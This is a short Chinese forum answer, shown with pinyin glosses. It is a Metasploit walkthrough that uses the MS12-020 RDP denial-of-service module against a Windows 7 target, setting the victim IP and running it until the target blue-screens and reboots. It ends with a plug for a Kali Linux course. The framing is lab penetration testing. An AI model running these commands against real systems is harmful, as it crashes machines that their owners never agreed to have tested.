網(wǎng)友解答: 分享一個(gè)小例子給你利用msf對(duì)MS12-020漏洞進(jìn)行滲透測(cè)試工具：metasploit靶機(jī)：windows 7 專(zhuān)業(yè)版 開(kāi)啟允許遠(yuǎn)程桌面連接（3389）主要是復(fù)用已知的ex

分享一個(gè)小例子給你

利用msf對(duì)MS12-020漏洞進(jìn)行滲透測(cè)試

工具：metasploit

靶機(jī)：windows 7 專(zhuān)業(yè)版 開(kāi)啟允許遠(yuǎn)程桌面連接（3389）

主要是復(fù)用已知的exploitcode(漏洞）代碼對(duì)系統(tǒng)進(jìn)行利用(滲透測(cè)試）

第一次使用建議在桌面直接打開(kāi)，不要在終端上打開(kāi)，因?yàn)槭状问褂迷摴ぞ邥?huì)初始化數(shù)據(jù)。

選項(xiàng)

banner 顯示Logo

search 關(guān)鍵字 利用search搜索可利用的漏洞

search ms12-020 搜索ms12-020漏洞

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids 應(yīng)用模塊

show options 顯示選項(xiàng)

set + 選項(xiàng)名

set rhost 被攻擊者ip 例如：set rhost 192.168.10.110

run 對(duì)ip的ms12-020漏洞進(jìn)行攻擊

被攻擊者藍(lán)屏重啟

show auxiliary 顯示輔助模塊

kali Linux的教程的話沒(méi)有比安全牛課堂上 苑房宏老師 的 kali Linux 滲透測(cè)試 這門(mén)課更好的了，目前 苑房宏老師自己還開(kāi)了一門(mén) kali Linux 工具大全的課程，也是相當(dāng)不錯(cuò)的，你可以去看看哦。